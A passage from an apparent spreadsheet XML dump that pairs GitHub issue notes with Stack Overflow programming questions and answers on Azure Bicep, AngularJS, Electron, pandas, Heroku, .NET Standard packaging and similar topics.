// deployed in a separate project. I just want to create an 
// empty Python Function App
@description('Name of the storage account')
param storageAccountName string = 'pyfunctest100'
@description('Name of the app service plan')
param appServicePlanName string = 'pyfunctestAppService'
@description('Name of the function app')
param functionAppName string = 'shawnopyFuncTest'
@description('Location for all resources')
param location string = resourceGroup().location
// Define the storage account resource
resource storageAccount 'Microsoft.Storage/storageAccounts@2022-09-01' = {
  name: storageAccountName
  location: location
  sku: {
    name: 'Standard_LRS'
  }
  kind: 'StorageV2'
}
// Define the app service plan resource
resource appServicePlan 'Microsoft.Web/serverfarms@2022-03-01' = {
  name: appServicePlanName
  location: location
  kind: 'linux'
  sku: {
    name: 'Y1'
    tier: 'Dynamic'
  }
  properties:{
    reserved: true
  }
}
// Define the function app resource (Updated API version)
resource functionApp 'Microsoft.Web/sites@2022-09-01' = {
  name: functionAppName
  location: location
  kind: 'functionapp,linux'
  properties: {
    serverFarmId: appServicePlan.id
    siteConfig: {
      linuxFxVersion: 'Python|3.11'
      appSettings: [
        {
          name: 'FUNCTIONS_WORKER_RUNTIME'
          value: 'python'
        }
        {
          name: 'AzureWebJobsStorage'
          value: storageAccount.properties.primaryEndpoints.blob
        }
      ]
    }
  }
}
output storageAccountName string = storageAccount.name
output appServicePlanName string = appServicePlan.name
output functionAppName string = functionApp.name
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've ran the above deployment in two completely separate Azure tenants and the result is always the same. My resource group rg-py-func-tst is populated with: a Storage Account named pyfunctest100; an App Service Plan named pyfunctestAppService; and, a Function App named shawnopyFuncTest. That's what I want; unfortunately, that isn't the end of the story.&lt;/p&gt;
&lt;p&gt;When I open my newly deployed empty Function App shawnopyFuncTest, I see the text &amp;quot;Error&amp;quot; in the Runtime Version field:
&lt;a href="https://i.sstatic.net/8loutwTK.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/8loutwTK.png" alt="Azure Portal Function App Page showing Runtime Version of Error" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;But what I expect to see for an empty Python function app is this:
&lt;a href="https://i.sstatic.net/TMwA5IyJ.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/TMwA5IyJ.png" alt="Azure Portal Function App Page for a Fresh Empty Python Function App Runtime Version is 4.1036.2.2" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Can someone please help me correct the Bicep that MS Copilot and Gemini created? If not, can you provide a simpler, more clean template that still does what I need?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C46</t>
  </si>
  <si>
    <t>Export module
An angular module had not been created to be exported to other
modules. See http://stackoverflow.com/questions/25411026/including-external-factories-in-angularjs-modules for more details.
Modules, "Bara" and "BaraData" will be exported and be available
to external modules.</t>
  </si>
  <si>
    <t>You would define your own module.
var specialHttpModule = angular.module("specialHttpModule", []);
specialHttpModule.service("someSpecialService", someSpecialService);
This would be in the
.js
file for this module.  Then, you would be able to include it as a dependency or retrieve it with
angular.module("specialHttpModule");
To add it to your
createPolicy
module you need to add the module name to the list of dependencies:
angular.module('createPolicy', ['kendo.directives', 'specialHttpModule'])
Then all the services, directives and controllers declared in
specialHttpModule
will be available in your module to inject:
.controller('CreatePolicyController', ['$scope', 'someSpecialService',
    function ($scope, someSpecialService) {</t>
  </si>
  <si>
    <t xml:space="preserve">Ok, I asked a question earlier about Flex and ADO.NET Data Services but didn't get much response so I thought I'd rephrase.  Does anyone have any experience building Adobe Flex applications with a .NET back-end?  If so, what architecture did you use and what third-party tools if any did you employ.  I've read a little about doing Flex remoting with WebORB but it seems more complicated than it should be, are web services an adequate alternative?
</t>
  </si>
  <si>
    <t>C460</t>
  </si>
  <si>
    <t>Spike communication with Costlocker in webview
https://stackoverflow.com/a/39443029
https://electronjs.org/docs/api/webview-tag#webviewexecutejavascriptcode-usergesture-callback</t>
  </si>
  <si>
    <t>You can access Electron APIs in the webview preload script, including IPC, even when nodeIntegration is disabled. Your preload script can inject functions into the global namespace that will then be accessible within the page loaded in the webview. A simple example:
webview-preload.js:
const { ipcRenderer } = require('electron')    
global.pingHost = () =&gt; {
  ipcRenderer.sendToHost('ping')
}
webview-index.html:
&lt;script&gt;
  pingHost()
&lt;/script&gt;
window-index.html:
&lt;script&gt;
  const webview = document.getElementById('mywebview')
  webview.addEventListener('ipc-message', event =&gt; {
    // prints "ping"
    console.log(event.channel)
  })
&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Just finished read [external-link] by Greg Young, where he is talking about Microsoft recommending patterns with dumb data transfer objects. He implied that in the Java community, things are trending the other direction.
My question is how much logic should be in your entity objects? Our philosophy where I work (C# shop) is that if you can't serialize it, don't put it in the entity.
</t>
  </si>
  <si>
    <t>C461</t>
  </si>
  <si>
    <t>VIVO-742: Move the SearchEngine behind an interface #697
Replacing SolrQueryTest?
http://stackoverflow.com/questions/936723/testing-solr-via-embedded-server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I tried running this code:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;import shap
from gcp_shared_utils.connectors.bucket import get_bucket_uri
 def read_explainerfile(self, bucket_name):
        try:
            bucket = self.client.bucket(bucket_name)
            logger.info(&amp;quot;the bucket location for explainer file&amp;quot;,bucket_name)
            blob = bucket.blob(&amp;quot;mytest_folder/shap_explainer_v2_1.pkl&amp;quot;)
            blob_data = blob.download_as_string()
            explainer = pickle.loads(blob_data)
            logger.info(&amp;quot;Explainer file has been retrieved successfully&amp;quot;, explainer)
            return explainer
        except Exception as e:
            logger.error(f&amp;quot;Failed to retrieve explainer file: {e}&amp;quot;)
        raise
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it raises the following exception:
&lt;code&gt;Error : [KFP Executor 2025-02-19 21:57:38,350 ERROR]: Failed to retrieve explainer file: Dispatcher._rebuild() got an unexpected keyword argument 'impl_kind'&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I have installed &lt;code&gt;shap==0.44.0&lt;/code&gt; and created a wheel file which is installed before the vertex pipeline execution starts.&lt;/p&gt;
&lt;p&gt;I also created a python file to read the shap explainer file from my Workbench and the file was successfully read, but the code failed when running through vertex pipeline.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C462</t>
  </si>
  <si>
    <t>Serve static assets from Razor class librarie
Currently static assets (css, js etc.) are copied to Fan.WebApp &gt; wwwroot at build time, this causes duplication of files and also complicates csproj files.
The new approach will be to have a wwwroot folder in each extension that requires static assets. When you have multiple Razor class libraries with same file names, for example styles.css, you will run into conflicts. To avoid this, the wwwroot will have sub-folders like this wwwroot/plugins/shortcodes/css/syntaxhighlighter.css.
Ref
https://github.com/aspnet/Identity/blob/master/src/UI/IdentityDefaultUIConfigureOptions.cs#L54-L74
https://stackoverflow.com/questions/51610513/can-razor-class-library-pack-static-files-js-css-etc-too</t>
  </si>
  <si>
    <t>Ehsan answer was correct at the time of asking (for .NET Core 2.2), for .NET Core 3.0 onwards (including .NET 7 when I update this link),
RCL can include static assets
without much effort:
To include companion assets as part of an RCL, create a wwwroot folder in the class library and include any required files in that folder.
When packing an RCL, all companion assets in the wwwroot folder are automatically included in the package.
The files included in the wwwroot folder of the RCL are exposed to the consuming app under the prefix _content/{LIBRARY NAME}/. For example, a library named Razor.Class.Lib results in a path to static content at _content/Razor.Class.Lib/.</t>
  </si>
  <si>
    <t xml:space="preserve">I think I've become quite good at the basics of programming (for a variety of languages).  I can write a good line of code.   I can write a good method.  I can write a good class. I can write a good group of classes.  I can write good small or medium application.
I do not however know how to build a good large application. Particularly in the case where multiple technologies are involved and more are likely to become involved with time.  Say a project with a large web front-end, a large server back-end that connects to some other integration back-end and finally a large and complex database.  Oh, I've been involved in a few of these applications and I could build one I'm sure. I'm not so sure however that it could qualify as "good".  
My question is thus for a reference to a book or other good source of reading where I could learn how to distribute and organize code and data for general large projects. For example, would I want to layer things very strictly or would I want to encapsulate it independent units instead?  Would I want to try to keep most of the logic in the same pool, or should it just be distributed as it seems most logical when adding whatever feature I'm adding? 
I've seen lots of general principals on these issues (e.g. No spaghetti code, meatball code...) and read a few excellent articles that discuss the matter but I've never encountered a source which would lead me to concrete practical knowledge.  I realize the difficulty of the question and so I'd be happy to just hear about the readings that others have found to help them in their quest for such knowledge.
As always, thank you for your replies.
  ****Given the debated nature of the definition of "good" code, the term "good" in this context won't be defined (it means whatever you think it ought to mean).
</t>
  </si>
  <si>
    <t>C463</t>
  </si>
  <si>
    <t>extendin album. To be fixed: Material-UI: A component is changing the uncontrolled value state of Autocomplete to be controlled. 
see https://stackoverflow.com/a/63300376/7362888</t>
  </si>
  <si>
    <t>When no value is selected, you need to add
|| null
to prevent the Autocomplete going into uncontrolled mode:
&lt;Autocomplete {...props} value={props.value || null} /&gt;
If you pass
value={undefined}
to the Autocomplete component, it will start in "uncontrolled" mode, meaning it keeps its own internal state. Then if you later supply a
value
it raises the "A component is changing" error. But if you pass
value={null}
instead of
value={undefined}
that causes the Autocomplete to start in controlled mode. The Autocomplete will assume you will be providing the state, not keep its own, and the error goes away.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;These pages do not explain the behavior of the &lt;code&gt;MoveFile&lt;/code&gt; function when the destination exists and is a symbolic link:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-movefile" rel="nofollow noreferrer"&gt;https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-movefile&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://learn.microsoft.com/en-us/windows/win32/fileio/symbolic-links" rel="nofollow noreferrer"&gt;https://learn.microsoft.com/en-us/windows/win32/fileio/symbolic-links&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In particular, what happens in the following cases:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The symbolic link points to a file&lt;/li&gt;
&lt;li&gt;The symbolic link points to a directory&lt;/li&gt;
&lt;li&gt;The symbolic link is broken&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If the move succeeds, does it replace the link itself, or the file that the link points to?&lt;/p&gt;
&lt;p&gt;What happens if the link points to the source?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C464</t>
  </si>
  <si>
    <t>Create unsubscribe observable mixin 
Should we create an unsubscribe observable mixin? This would automatically handle creating an unsubscribe observable which calls .next() and .complete() in the ngOnDestroy() function. However this would come with the downside there is no in-built linting to detect if observables are being properly unsubscribed. The implementation of this solution would be harder to enforce during reviews.
Example mixin code:
function WithDestroy&lt;T extends Constructor&lt;{}&gt;&gt;(Base: T = (class {} as any)) {
  return class extends Base implements OnDestroy {
    destroy$  = new Subject&lt;void&gt;()
    ngOnDestroy() {
      this.destroy$.next();
    }
  }
}
The main difference is that I no longer have to a) define an unsubscribe observable, and b) call its destruction in the ngOnDestroy function. Functionally both of these components are the same, it's just that I have to repeat the code for creating and destroying the unsubscribe observable in every single class which uses an observable which is a lot of redundant code for something that may be handled automatically in the future.
Relevant excerpt from link:
In response Ben mentions that there are discussions right now to allow Observables to hook into the Angular component lifecycle events and Ward suggests an Observable of lifecycle events that a component could subscribe to as a way of knowing when to complete Observables maintained as component internal state.
Relevant link: https://stackoverflow.com/questions/38008334/angular-rxjs-when-should-i-unsubscribe-from-subscription</t>
  </si>
  <si>
    <t xml:space="preserve">I have been watching the growing visibility of functional programming languages and features for a while. I looked into them and didn't see the reason for the appeal. 
Then, recently I attended Kevin Smith's "Basics of Erlang" presentation at [external-link]. 
I enjoyed the presentation and learned that a lot of the attributes of functional programming make it much easier to avoid threading/concurrency issues. I understand the lack of state and mutability makes it impossible for multiple threads to alter the same data, but Kevin said (if I understood correctly) all communication takes place through messages and the mesages are processed synchronously (again avoiding concurrency issues). 
But I have read that Erlang is used in highly scalable applications (the whole reason Ericsson created it in the first place). How can it be efficient handling thousands of requests per second if everything is handled as a synchronously processed message? Isn't that why we started moving towards asynchronous processing - so we can take advantage of running multiple threads of operation at the same time and achieve scalability? It seems like this architecture, while safer, is a step backwards in terms of scalability. What am I missing?
I understand the creators of Erlang intentionally avoided supporting threading to avoid concurrency problems, but I thought multi-threading was necessary to achieve scalability. 
How can functional programming languages be inherently thread-safe, yet still scale?
</t>
  </si>
  <si>
    <t>C465</t>
  </si>
  <si>
    <t>Replacing SolrQueryTest?
http://stackoverflow.com/questions/936723/testing-solr-via-embedded-server
Moving the SearchEngine behind an interface</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My project works fine in development mode. But I cannot get it deployed properly on heroku.The problem is I can't find a way to forward requests from (frontend) React to the (backend) API.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Here are the contents of my Procfile&lt;/strong&gt;&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;web: node index.js
web-backend: gunicorn server.backend.rest_api.rest_api.wsgi:application --bind 0.0.0.0:$PORT --log-file -
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In development mode I use React's setupProxy.js like so:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;export default function (app) {
    console.log('Setting up proxy..................');
    app.use(
        '/api',
        createProxyMiddleware({
            target: 'http://localhost:8000', // Your Django backend URL during development
            changeOrigin: true,
        })
    );
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It's a piece of cake because I know what port my backend is listening.&lt;/p&gt;
&lt;p&gt;But on heroku, I don't know how to get the port number on which the django rest api is listening. Upon deploying the project I can see it in the console, but the port number gets assigned during the deployment process, so it is never the same one.&lt;/p&gt;
&lt;p&gt;There must be a way to set this up. If anyone knows how to make it happen. I would really appreciate if you let me know.&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
&lt;p&gt;I have been asking several AIs like copilot or Google's Gemini. But nothing they suggests helps or makes sense a lot of the time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C466</t>
  </si>
  <si>
    <t>Reduce number of dependencies for core librar
When adding prerelease 1013 - a lot of System dependencies are also added to the application.
Should we change this? with DisableImplicitFrameworkReferences in the csproj file?
PM&gt; Install-Package OxyPlot.Wpf -Version 2.0.0-unstable1013 -Source https://www.myget.org/F/oxyplot/api/v3/index.json
See also
https://stackoverflow.com/questions/43995354/reducing-dependencies-for-a-net-standard-class-library</t>
  </si>
  <si>
    <t>This is quite a complex situation at the moment:
Can I add only the packages I need and still target .NET Standard 1.0?
Yes you can do it, but this is no longer recommended. In essence,
.NET Standard
is a specification that is made up of the packages referencing it. The supported way is to reference
NETStandard.Library
since it guarantees to bring you all needed compilation references and logic that you need in order to build correctly.
Beginning with the upcoming
netstandard2.0
,
NETStandard.Library
will be a flat package without dependencies and the individual packages will be removed from the dependency tree if your project or any other project references them. Also,
NETStandard.Library
will not be published as a dependency - so if you build a
netstandard2.0
library, the resulting NuGet package will have no dependencies. (
NETStandard.Library.NETFramework
is required to be installed when using it in .net framework projects - NuGet is supposed to do this automatically).
That being said, if you really want to do it, you can set
&lt;DisableImplicitFrameworkReferences&gt;true&lt;/DisableImplicitFrameworkReferences&gt;
in the
csproj
file and then add items like
&lt;PackageReference Include="System.[Something]" Version="4.3.0" /&gt;
for everything you need.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking at building a client server application in C# using winforms or WPF.  The client application must be a local application because it has to interact with specialised hardware.
The architecture I'm looking for is the client connects to a server port using TCP/IP.  The client will then make requests to the server and the server will send responses to the client.  The client wills stay connected to the server while the user is logged in.
I have looked at web services and as far as I can figure out, WCF extends web services which means there is no way for the server to send a message to the client.
Am I incorrect about WCF?  If not what is the best way to accomplish this?
</t>
  </si>
  <si>
    <t>C467</t>
  </si>
  <si>
    <t>Write useful Binding library 
http://stackoverflow.com/questions/11091791/convert-eclipse-jdt-itypebinding-to-a-type</t>
  </si>
  <si>
    <t>I've just found an alternative solution which might be preferable. You could use
org.eclipse.jdt.core.dom.rewrite.ImportRewrite
, which manages import statements of a compilation unit. Using Type addImport(ITypeBinding,AST), you can create a new Type node taking existing imports into account and adding new ones if necessary.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h1&gt;SET UP MY PROBLEM&lt;/h1&gt;
&lt;p&gt;I have two pandas dataframes. First, I have &lt;code&gt;main&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import pandas as pd
import numpy as np
main = pd.DataFrame({&amp;quot;foo&amp;quot;:{&amp;quot;a&amp;quot;:1.0,&amp;quot;b&amp;quot;:2.0,&amp;quot;c&amp;quot;:3.0,&amp;quot;d&amp;quot;:np.nan},&amp;quot;bar&amp;quot;:{&amp;quot;a&amp;quot;:&amp;quot;a&amp;quot;,&amp;quot;b&amp;quot;:&amp;quot;b&amp;quot;,&amp;quot;c&amp;quot;:np.nan,&amp;quot;d&amp;quot;:&amp;quot;d&amp;quot;},&amp;quot;baz&amp;quot;:{&amp;quot;a&amp;quot;:np.nan,&amp;quot;b&amp;quot;:&amp;quot;x&amp;quot;,&amp;quot;c&amp;quot;:&amp;quot;y&amp;quot;,&amp;quot;d&amp;quot;:&amp;quot;z&amp;quot;}})
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Picture for example:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/jyUz5xJF.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/jyUz5xJF.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I have a second dataframe, called &lt;code&gt;backfill&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;backfill = pd.DataFrame({&amp;quot;foo&amp;quot;:{&amp;quot;a&amp;quot;:9.0,&amp;quot;b&amp;quot;:np.nan,&amp;quot;c&amp;quot;:7.0,&amp;quot;d&amp;quot;:4.0},&amp;quot;bar&amp;quot;:{&amp;quot;a&amp;quot;:np.nan,&amp;quot;b&amp;quot;:&amp;quot;r&amp;quot;,&amp;quot;c&amp;quot;:&amp;quot;c&amp;quot;,&amp;quot;d&amp;quot;:&amp;quot;s&amp;quot;},&amp;quot;baz&amp;quot;:{&amp;quot;a&amp;quot;:&amp;quot;w&amp;quot;,&amp;quot;b&amp;quot;:&amp;quot;l&amp;quot;,&amp;quot;c&amp;quot;:&amp;quot;m&amp;quot;,&amp;quot;d&amp;quot;:np.nan},&amp;quot;foobar&amp;quot;:{&amp;quot;a&amp;quot;:&amp;quot;baz&amp;quot;,&amp;quot;b&amp;quot;:np.nan,&amp;quot;c&amp;quot;:np.nan,&amp;quot;d&amp;quot;:np.nan}})
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Picture for example:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/o1r2sHA4.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/o1r2sHA4.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;hr /&gt;
&lt;h1&gt;WHAT I AM TRYING TO DO&lt;/h1&gt;
&lt;p&gt;I am trying to backfill any missing values or columns in &lt;code&gt;main&lt;/code&gt; with the values from &lt;code&gt;backfill&lt;/code&gt;, while prioritizing the values already present in &lt;code&gt;main&lt;/code&gt;. That is, I would like to fill any missing value in &lt;code&gt;main&lt;/code&gt; with the respective value in &lt;code&gt;backfill&lt;/code&gt; AND add any columns and their values not in &lt;code&gt;main&lt;/code&gt; with the respective values from &lt;code&gt;backfill&lt;/code&gt;. Is there a one line solution to this part of the problem that works well with the solution to the first step I have figured out, or perhaps an entirely different approach that is more pythonic and computationally efficient?&lt;/p&gt;
&lt;hr /&gt;
&lt;hr /&gt;
&lt;h1&gt;MY DESIRED OUTPUT&lt;/h1&gt;
&lt;p&gt;Based on my explanation above, this is my desired output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
{&amp;quot;foo&amp;quot;:{&amp;quot;a&amp;quot;:1,&amp;quot;b&amp;quot;:2,&amp;quot;c&amp;quot;:3,&amp;quot;d&amp;quot;:4},&amp;quot;bar&amp;quot;:{&amp;quot;a&amp;quot;:&amp;quot;a&amp;quot;,&amp;quot;b&amp;quot;:&amp;quot;b&amp;quot;,&amp;quot;c&amp;quot;:&amp;quot;c&amp;quot;,&amp;quot;d&amp;quot;:&amp;quot;d&amp;quot;},&amp;quot;baz&amp;quot;:{&amp;quot;a&amp;quot;:&amp;quot;w&amp;quot;,&amp;quot;b&amp;quot;:&amp;quot;x&amp;quot;,&amp;quot;c&amp;quot;:&amp;quot;y&amp;quot;,&amp;quot;d&amp;quot;:&amp;quot;z&amp;quot;},&amp;quot;foobar&amp;quot;:{&amp;quot;a&amp;quot;:&amp;quot;baz&amp;quot;,&amp;quot;b&amp;quot;:null,&amp;quot;c&amp;quot;:null,&amp;quot;d&amp;quot;:null}}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Picture for example:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/r8sT5fkZ.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/r8sT5fkZ.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;As you can see, the missing values and columns in &lt;code&gt;main&lt;/code&gt; are filled with the respective values of &lt;code&gt;backfill&lt;/code&gt; while maintaining the populated values of &lt;code&gt;main&lt;/code&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;hr /&gt;
&lt;h1&gt;WHAT I HAVE TRIED&lt;/h1&gt;
&lt;p&gt;The following code seems to satisfy one of the conditions of my problem:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;main[main.isnull()] = backfill
{&amp;quot;foo&amp;quot;:{&amp;quot;a&amp;quot;:1.0,&amp;quot;b&amp;quot;:2.0,&amp;quot;c&amp;quot;:3.0,&amp;quot;d&amp;quot;:4.0},&amp;quot;bar&amp;quot;:{&amp;quot;a&amp;quot;:&amp;quot;a&amp;quot;,&amp;quot;b&amp;quot;:&amp;quot;b&amp;quot;,&amp;quot;c&amp;quot;:&amp;quot;c&amp;quot;,&amp;quot;d&amp;quot;:&amp;quot;d&amp;quot;},&amp;quot;baz&amp;quot;:{&amp;quot;a&amp;quot;:&amp;quot;w&amp;quot;,&amp;quot;b&amp;quot;:&amp;quot;x&amp;quot;,&amp;quot;c&amp;quot;:&amp;quot;y&amp;quot;,&amp;quot;d&amp;quot;:&amp;quot;z&amp;quot;}}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I cannot figure out how to add the &lt;code&gt;foobar&lt;/code&gt; column and its values from &lt;code&gt;backfill&lt;/code&gt; to &lt;code&gt;main&lt;/code&gt;. Of course I could technically merge it, but I would only want to merge the &lt;code&gt;foobar&lt;/code&gt; column, and in the irl issue I am facing, I may not always know the name of columns that need to be added to &lt;code&gt;main&lt;/code&gt;, which makes merging seem impractical.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;Thank you for taking a look at my question.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT(s): grammar, formatting&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C468</t>
  </si>
  <si>
    <t>Opening model does not work
I have converted a 0.5.x model and made some adjustments. When I close MOST after that and try to reopen it does not work. No window appears.
mostapp looks like:
application SimpleMedia {
    documentation "Simple file and media management in Collections."
    vendor None
    author "Erik Spaan"
    email "erik@zikula.nl"
    url "https://github.com/zikula-ev/SimpleMedia"
    version "2.0.0"
    prefix simmed
    modelPath ""
    targetCoreVersion ZK135
    modelLayer {
        modelContainer Model {
            numExampleRows 0
            entities {
                entity medium leading geographical categorisable metaData {
                    documentation "Media of all sorts"
                    nameMultiple media
                    incoming ( "collection.media" ) fields {
                        string title leading {
                            documentation "Medium title"
                            defaultValue ""
                            sluggablePosition 1
                        },
                        upload theFile {
                            allowedExtensions
                            "gif, jpeg, jpg, png, pdf, doc, xls, ppt, docx, xlsx, pptx, odt, ods, odp, arj, zip, rar, tar, tgz, gz, bz2, txt, rtf, swf, flv, mp3, mp4, avi, mpg, mpeg, mov"
                            subFolderName ""
                        },
                        text description {
                            documentation "Extensive description of the medium"
                            defaultValue ""
                            mandatory false
                        },
                        array additionalData {
                            documentation "Can contain infomation like exif, IPTC, XMP, Copyright, Etc."
                            defaultValue ""
                            mandatory false
                        },
                        integer previewImage {
                            documentation "Contains an optional thumbnail image for the medium item."
                            defaultValue "0"
                            mandatory false
                        },
                        integer sortValue {
                            documentation "Used for sorting media within a collection."
                            defaultValue ""
                            mandatory false
                        },
                        list mediaType {
                            mandatory false
                            items {
                                default listItem Image ( ^image ),
                                listItem Movie ( movie ),
                                listItem Audio ( audio ),
                                listItem Text ( ^text ),
                                listItem Other ( other )
                            }
                        },
                        integer viewsCount {
                            documentation "The number of views for this medium"
                            defaultValue "0"
                            mandatory false
                            readOnly true
                        }
                    }
                },
                entity collection categorisable {
                    documentation "Collections form a nested tree that can contain one or more media items and collections."
                    nameMultiple collections
                    tree NESTED
                    outgoing ( "collection.media" ) fields {
                        string title leading {
                            documentation "Collection title"
                            defaultValue ""
                        },
                        text description {
                            documentation "Extensive description of the collection"
                            defaultValue ""
                            mandatory false
                        },
                        integer previewImage {
                            documentation "The representing thumbnail image. Does not have to be within the collection itself."
                            defaultValue "0"
                            mandatory false
                        },
                        integer sortValue {
                            documentation "Used for sorting collections within a parent collection."
                            defaultValue ""
                            mandatory false
                        },
                        integer viewsCount {
                            documentation "The number of views for this collection"
                            defaultValue "0"
                            mandatory false
                            readOnly true
                        }
                    }
                }
            }
            relations {
                one2many bidirectional unique {
                    source collection
                    sourceAlias collection
                    target medium
                    targetAlias media
                    nullable false
                    editType ACTIVE_EDIT_PASSIVE_EDIT
                }
            }
            variables {
                varContainer MediaSettings {
                    documentation "Here you manage all configuration settings for SimpleMedia"
                    vars {
                        intVar pageSize {
                            documentation "Number of items on a page (backend)"
                            value "20"
                        },
                        intVar mediaPageSize {
                            documentation "Number of media on a page (frontend)"
                            value "15"
                        },
                        intVar collectionsPageSize {
                            documentation "Number of collections on a page (frontend)"
                            value "6"
                        },
                        textVar thumbDimensions {
                            documentation
                            "Contains an array of thumbnail widthxheight dimensions array ( array ( width =&gt; 200, height =&gt; 150 ) )"
                            value ""
                        },
                        intVar defaultThumbNumber {
                            documentation "The default thumbnail that is used from the set of Thumbdimensions"
                            value "1"
                        },
                        boolVar enableShrinking {
                            documentation "Enable shrinking to maximum image dimensions, original image not stored"
                            value ^false
                        },
                        textVar shrinkDimensions {
                            documentation "Maximum image dimensions after shrink (w x h)"
                            value ""
                        },
                        boolVar useThumbCropper {
                            documentation "Use cropper for the thumbnail image"
                            value ^false
                        },
                        intVar cropSizeMode {
                            documentation "Cropping size mode"
                            value "0"
                        },
                        textVar ^allowedExtensions {
                            documentation "Allowed file extensions for file upload"
                            value "gif, jpeg, jpg, png, pdf, txt, mp3, mp4, avi, mpg, mpeg, mov"
                            maxLength 255
                        },
                        intVar maxUploadFileSize {
                            documentation "Maximum File Size during upload in kB. Default after install is 5 MB."
                            value "5000"
                        },
                        intVar minWidthForUpload {
                            documentation "Minimum pixel width of an image to upload, to be able to generate thumbnails."
                            value "100"
                        },
                        intVar defaultCollection {
                            documentation "The default Collection that is used for new Media."
                            value "1"
                        },
                        textVar mediaDir {
                            documentation "The folder location under userdata/SimpleMedia where the uploaded files are stored."
                            value "media/thefile"
                            maxLength 100
                        },
                        textVar mediaThumbDir {
                            documentation "Media thumbnail folder name"
                            value tmb
                            maxLength 100
                        },
                        textVar mediaThumbExt {
                            documentation "Media thumbnail suffix"
                            value "_tmb_"
                            maxLength 20
                        },
                        boolVar countMediumViews {
                            documentation "Should the number of times a medium is viewed be counted"
                            value ^false
                        },
                        boolVar countCollectionViews {
                            documentation "Should the number of times a collection is viewed be counted"
                            value ^false
                        }
                    }
                }
            }
        }
    }
    controllerLayer {
        controllerContainer Controller {
            modelContext ( "SimpleMedia.Model" )
            processViews "SimpleMedia.View"
            controllers {
                adminController Admin {
                    actions {
                        mainAction Main,
                        viewAction View,
                        displayAction Display,
                        editAction Edit,
                        customAction Import
                    }
                },
                userController User {
                    actions {
                        mainAction Main,
                        viewAction View,
                        displayAction Display
                    }
                },
                ajaxController Ajax {
                    actions {
                        mainAction Main
                    }
                }
            }
        }
    }
    viewLayer {
        viewContainer View {
            controller "SimpleMedia.Controller"
        }
    }
}
 read here http://stackoverflow.com/questions/12360304/problems-running-eclipse-juno-64-bit-on-mac-lion something about eclipse 64bit on Lion, but not sure if it is related</t>
  </si>
  <si>
    <t>found the problem... I used Unarchiver to unpack the pack... It seems to have a bug... When I used another program to unpack it it worked :-)
here the eclipse link as reference:
https://bugs.eclipse.org/bugs/show_bug.cgi?id=305758</t>
  </si>
  <si>
    <t xml:space="preserve">Here at work we have a very large application with multiple sub applications. (500 + dlls)
As a developer it is very frustrating working with all these dlls and dependencies. You create a new project and add 5+ dlls to get core pieces of the system to work (Logging, Auditing, security, messaging ect). Each new subapplication we add, we make a web project, a business layer, a data layer and any other projects needed to share objects between the 3, so our list just keeps expanding. 
My question is what is the best way to manage this? i can't seem to think what is best.. the modular approach seems good for re-usablity, and hot patching items without taking down the system for one application. But the headache in managing 500 dlls is a nightmare.
Does each subsystem really need 3-4 projects, and reference the other 5 core pieces?
What are other ways of managing large projects keeping managing/developing and deploying in mind?
</t>
  </si>
  <si>
    <t>C469</t>
  </si>
  <si>
    <t>Update class diagram for selected architecture
Because you too you don't remember what mean these shitty arrows
http://stackoverflow.com/questions/1874049/explanation-of-the-uml-arrows</t>
  </si>
  <si>
    <t>Here's some explanations from the Visual Studio 2015 docs:
UML Class Diagrams: Reference
:
